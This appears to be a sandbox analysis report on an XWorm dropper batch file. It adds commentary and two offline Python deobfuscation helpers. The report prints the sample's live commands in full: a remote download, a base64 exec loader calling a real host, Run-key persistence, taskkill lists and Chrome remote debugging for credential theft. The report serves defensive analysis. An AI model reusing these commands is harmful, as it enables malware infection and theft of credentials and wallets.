Malware Analysis Report

2025-08-05 11:54

Sample ID: 241015-3n412ashja
Target: 11.bat
SHA256: 2f4252bb9695dd309f064d40d3fa45a122e6a44b3c442bff8d1ee1cd0a27c0fc
Tags: xworm credential_access discovery persistence rat spyware stealer trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score: 10/10
SHA256: 2f4252bb9695dd309f064d40d3fa45a122e6a44b3c442bff8d1ee1cd0a27c0fc
Threat Level: Known bad
The file 11.bat was found to be: Known bad.

Malicious Activity Summary

Tags: xworm credential_access discovery persistence rat spyware stealer trojan

Detect Xworm Payload
Xworm
Uses browser remote debugging
Blocklisted process makes network request
Reads user/profile data of web browsers
Executes dropped EXE
Unsecured Credentials: Credentials In Files
Loads dropped DLL
Checks computer location settings
Looks up external IP address via web service
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Browser Information Discovery
Enumerates system info in registry
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-10-15 23:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-10-15 23:40
Reported: 2024-10-15 23:43
Platform: win7-20241010-en
Max time kernel: 122s
Max time network: 129s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

Signatures

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
(identical consecutive rows collapsed; count in parentheses)
PID 524 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com (x3)
PID 524 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe (x3)
PID 2556 wrote to memory of 2016 N/A C:\Windows\system32\mshta.exe C:\Windows\system32\cmd.exe (x3)
PID 2016 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com (x3)
PID 2016 wrote to memory of 2724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe (x3)
PID 2016 wrote to memory of 2872 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x3)

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("wscript.shell").run("""C:\Users\Admin\AppData\Local\Temp\11.bat"" ::",0)(window.close)

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\11.bat" ::"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.P~37, 1%w%jF,fXtX%k%Qi[NN,$AICSALx_$$%coMMONPRogRAmw6432:~1, 1%J1%dGtLVU%h%jQqkBx%w%ohVlWGB%W1%WWLhu%h%pRJZg%p%tRQR,Bj%s%dLQP?g%S1%XVlPzC%d%])b#j?%w%ipATPi_%k%GoA$sjtXRUWldbsveEsiUdSjdtF])g$%a%zN[h$P::FWfQj3f9.zip') "
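The PowerShell command this Win7 run handed to cmd is only half assembled. Fragments such as `%coMMONPRogRAmw6432:~1, 1%` are cmd's `%VAR:~start,len%` substring syntax, which means 11.bat spells its commands out of single characters taken from environment variables, and on this platform some of those references did not resolve (the win10 run further down shows the same step resolved to `[System.IO.Path]::GetTempPath() + 'x1FWfQj3f9.zip'`, and only that run reaches the download). The report does not say why the Win7 run failed to resolve; a referenced variable that does not exist on the platform is one plausible cause, not a finding. A resolver that replays such a line against a chosen environment snapshot is the quickest way to read this kind of batch without running it. The following is an added example, not code from the report or from the sample; the environment values and the obfuscated line are constructed (typical default values) to show the mechanism, including what happens when a referenced variable such as COMMONPROGRAMW6432, which exists only on 64-bit Windows, is absent.

```python
"""Resolve cmd.exe %VAR:~start,len% substring obfuscation offline.

Added example, not code from the report or from 11.bat. The environment
snapshot and the obfuscated line are constructed (typical default values)
to show the mechanism; only the syntax is taken from the report.
"""
from __future__ import annotations
import re

# %NAME%, %NAME:~start% and %NAME:~start,len%. Whitespace inside the numbers is
# tolerated, as in the report's own "%coMMONPRogRAmw6432:~1, 1%"; "%%" is a
# literal percent sign. cmd's octal form (leading 0) and %NAME:str=rep% are not handled.
NUM = r"-?\s*(?:0x[0-9A-Fa-f]+|\d+)"
TOKEN = re.compile(
    r"%%|%(?P<name>[^%:~]+?)"
    r"(?::~\s*(?P<start>" + NUM + r")\s*(?:,\s*(?P<len>" + NUM + r")\s*)?)?%"
)

def _num(text: str) -> int:
    t = text.replace(" ", "")
    return int(t, 16) if t.lower().lstrip("-").startswith("0x") else int(t, 10)

def cmd_substring(value: str, start: int, length: int | None) -> str:
    """cmd's rules: a negative start counts from the end (clamped to 0), a start past
    the end yields '', a negative length drops that many characters from the end."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if start >= n:
        return ""
    if length is None:
        return value[start:]
    if length < 0:
        end = n + length
        return value[start:end] if end > start else ""
    return value[start:start + length]

def expand(line: str, env: dict[str, str], keep_undefined: bool = False) -> str:
    """One expansion pass, as cmd does for a batch file: names are case-insensitive
    and an undefined variable expands to nothing. keep_undefined=True mimics the
    interactive prompt, which leaves unknown references in place."""
    lookup = {k.upper(): v for k, v in env.items()}

    def repl(m: re.Match) -> str:
        name = m.group("name")
        if name is None:                      # matched "%%"
            return "%"
        value = lookup.get(name.upper())
        if value is None:
            return m.group(0) if keep_undefined else ""
        if m.group("start") is None:          # plain %NAME%
            return value
        length = _num(m.group("len")) if m.group("len") is not None else None
        return cmd_substring(value, _num(m.group("start")), length)

    return TOKEN.sub(repl, line)

# Constructed 64-bit snapshot (default values). COMMONPROGRAMW6432 exists only on
# 64-bit Windows, so it is absent from the 32-bit snapshot derived from it.
ENV_X64 = {
    "APPDATA": r"C:\Users\Admin\AppData\Roaming",
    "ComSpec": r"C:\Windows\system32\cmd.exe",
    "SystemRoot": r"C:\Windows",
    "COMMONPROGRAMW6432": r"C:\Program Files\Common Files",
    "PSModulePath": r"C:\Program Files\WindowsPowerShell\Modules",
}
ENV_X86 = {k: v for k, v in ENV_X64.items() if not k.endswith("W6432")}

# Constructed line in the report's style: each %...% yields one or two characters.
OBFUSCATED = (
    "%APPDATA:~16,1%%ComSpec:~-20,1%%SystemRoot:~-2,1%%ComSpec:~-3,1%"
    "%coMMONPRogRAmw6432:~4, 1%%ComSpec:~11,1%"
    "%PSModulePath:~30,1%%PSModulePath:~31,1%%PSModulePath:~32,2%"
)

if __name__ == "__main__":
    print(expand(OBFUSCATED, ENV_X64))                       # powershell
    print(expand(OBFUSCATED, ENV_X86))                       # poweshell
    print(expand(OBFUSCATED, ENV_X86, keep_undefined=True))  # reference left in place
```

Replaying the same line against the two snapshots shows the failure mode directly: on the 64-bit environment the fragments assemble into `powershell`, on the 32-bit one the missing variable silently drops a character and the command no longer means anything. When triaging a real batch, take the snapshot from `set` on a host matching the victim rather than from your analysis box.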

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files

memory/2872-5-0x000000001B360000-0x000000001B642000-memory.dmp

memory/2872-6-0x0000000002320000-0x0000000002328000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-10-15 23:40
Reported: 2024-10-15 23:43
Platform: win10v2004-20241007-en
Max time kernel: 149s
Max time network: 150s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A (x38, identical rows collapsed)

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security = "C:\\Windows\\Explorer.EXE C:\\Users\\Admin\\AppData\\Local\\WindowsSecurity.lnk" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
(identical consecutive rows collapsed; count in parentheses)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A (x11)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A (x24)

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A (x35, identical rows collapsed)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
(identical consecutive rows collapsed; count in parentheses)
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (x4)
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A (x35)
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (x3, alternating with the next row)
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (x3)
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
(identical consecutive rows collapsed; count in parentheses)
PID 384 wrote to memory of 4160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com (x2)
PID 384 wrote to memory of 1176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe (x2)
PID 1176 wrote to memory of 2340 N/A C:\Windows\system32\mshta.exe C:\Windows\system32\cmd.exe (x2)
PID 2340 wrote to memory of 4764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com (x2)
PID 2340 wrote to memory of 3476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe (x2)
PID 2340 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x2)
PID 2340 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe (x2)
PID 2340 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x2)
PID 2340 wrote to memory of 3852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe (x2)
PID 2340 wrote to memory of 3820 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x2)
PID 2340 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe (x2)
PID 2340 wrote to memory of 2488 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (x2)
PID 2340 wrote to memory of 5028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe (x2)
PID 5028 wrote to memory of 3408 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe (x3)
PID 3408 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe (x3)
PID 3408 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe (x3)
PID 3408 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe (x3)
PID 3408 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe (x3)
PID 3408 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe (x3)
PID 3408 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe (x3)
PID 3408 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe (x3)
PID 3408 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe (x3)
PID 3408 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe (x3)
PID 3408 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe (x3)
PID 3408 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe (x3)
PID 3408 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe C:\Windows\SysWOW64\taskkill.exe (x2, list truncated by the sandbox)

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("wscript.shell").run("""C:\Users\Admin\AppData\Local\Temp\11.bat"" ::",0)(window.close)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\11.bat" ::"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.Path]::GetTempPath() + 'x1FWfQj3f9.zip') "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'x1FWfQj3f9'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'x1FWfQj3f9.zip'), $dst) "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9YLU1ldGEvWC1NZXRhJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\x1FWfQj3f9\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\WindowsSecurity.lnk' -Force "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

cmd.exe /c start "" "C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9YLU1ldGEvWC1NZXRhJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"
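The five cmd/PowerShell steps above form one installer: fetch synaptics.zip into %TEMP% as x1FWfQj3f9.zip, unpack it to %LOCALAPPDATA%\x1FWfQj3f9, write WindowsSecurity.lnk (Edge icon, minimised window) whose target is synaptics.exe with a `-c "import base64;exec(base64.b64decode('...'))"` argument, register that shortcut under HKCU\...\Run as "Windows Security", then start synaptics.exe with the same argument. Each `cmd /S /D /c" echo <script> "` entry is followed by a powershell.exe child of the same parent, so the script is presumably fed over a pipe; the captured command lines do not show the pipe. The `-c` argument is Python source, so synaptics.exe is acting as a Python interpreter (inferred from the syntax; the report does not state it). Below is an added example, not code from the report: a decoder that peels the inline `exec(base64.b64decode(...))` layers without executing anything and lists the URL the next stage would contact. The blob is copied verbatim from the command line above.

```python
"""Peel the exec(base64.b64decode('...')) layers of the synaptics.exe argument.

Added example, not part of the report. The blob is copied verbatim from the
command line above. Nothing is executed and nothing is fetched: the decoder
only unwraps the inline layers and reports the URL the next stage would pull.
"""
from __future__ import annotations
import base64
import re

# The argument after "-c" in the report's process list (verbatim).
STAGE1_ARG = (
    "import base64;exec(base64.b64decode('"
    "aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9YLU1ldGEvWC1NZXRhJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp"
    "'))"
)

# Only a quoted literal counts as an inline layer; b64decode(urlopen(...)) is the
# hand-off to the network and stops the unwrapping.
INLINE_BLOB = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL = re.compile(r"https?://[^\s'\"()]+")

def b64_decode_lenient(blob: str) -> str:
    """Decode base64 whose '=' padding may have been stripped (common in droppers)."""
    blob = blob.strip()
    return base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8")

def unwrap_stages(arg: str, max_depth: int = 8) -> list[str]:
    """Return every inline layer, outermost first, stopping at the first layer whose
    b64decode() argument is not a literal. max_depth guards against self-referential
    loaders that would otherwise spin forever."""
    layers = [arg]
    while len(layers) <= max_depth:
        m = INLINE_BLOB.search(layers[-1])
        if m is None:
            break
        layers.append(b64_decode_lenient(m.group(1)))
    return layers

def next_stage_urls(arg: str) -> list[str]:
    """URLs referenced by any decoded layer, deduplicated, in order of appearance."""
    seen: list[str] = []
    for layer in unwrap_stages(arg):
        for u in URL.findall(layer):
            if u not in seen:
                seen.append(u)
    return seen

if __name__ == "__main__":
    for depth, layer in enumerate(unwrap_stages(STAGE1_ARG)):
        print(f"--- layer {depth} ---\n{layer}")
    print("next stage fetched from:", next_stage_urls(STAGE1_ARG))
```

The decoded layer is a one-line downloader (`urllib.request.urlopen(...).read()`, base64-decoded and passed to `exec`), so the code that actually runs on the host is never on disk and never in a command line: it lives only on the tvdseo.com server, which is why the static analysis of 11.bat reports nothing and why the X-Meta URL, not the batch file, is the indicator worth blocking.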

C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe

"C:\Users\Admin\AppData\Local\x1FWfQj3f9\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9YLU1ldGEvWC1NZXRhJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"

C:\Windows\SysWOW64\taskkill.exe (35 invocations spawned by synaptics.exe, one per image name)

taskkill /F /IM Coinomi.exe
taskkill /F /IM bytecoin-gui.exe
taskkill /F /IM Element.exe
taskkill /F /IM "Atomic Wallet.exe"
taskkill /F /IM Exodus.exe
taskkill /F /IM ArmoryQt.exe
taskkill /F /IM Guarda.exe
taskkill /F /IM KeePassXC.exe
taskkill /F /IM NordVPN.exe
taskkill /F /IM OpenVPNConnect.exe
taskkill /F /IM seamonkey.exe
taskkill /F /IM Signal.exe
taskkill /F /IM filezilla.exe
taskkill /F /IM filezilla-server-gui.exe
taskkill /F /IM keepassxc-proxy.exe
taskkill /F /IM nordvpn-service.exe
taskkill /F /IM steam.exe
taskkill /F /IM walletd.exe
taskkill /F /IM waterfox.exe
taskkill /F /IM Discord.exe
taskkill /F /IM DiscordCanary.exe
taskkill /F /IM burp.exe
taskkill /F /IM Ethereal.exe
taskkill /F /IM EtherApe.exe
taskkill /F /IM fiddler.exe
taskkill /F /IM HTTPDebuggerSvc.exe
taskkill /F /IM HTTPDebuggerUI.exe
taskkill /F /IM snpa.exe
taskkill /F /IM solarwinds.exe
taskkill /F /IM tcpdump.exe
taskkill /F /IM telerik.exe
taskkill /F /IM wireshark.exe
taskkill /F /IM winpcap.exe
taskkill /F /IM telegram.exe
taskkill /F /IM chrome.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa7ba1cc40,0x7ffa7ba1cc4c,0x7ffa7ba1cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1916,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1992,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1960 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=2056,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2900,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2908 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2912,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2936 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4048,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4016 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=4120,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4100 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=4116,i,15968624592994161905,3449659487766153157,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4156 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
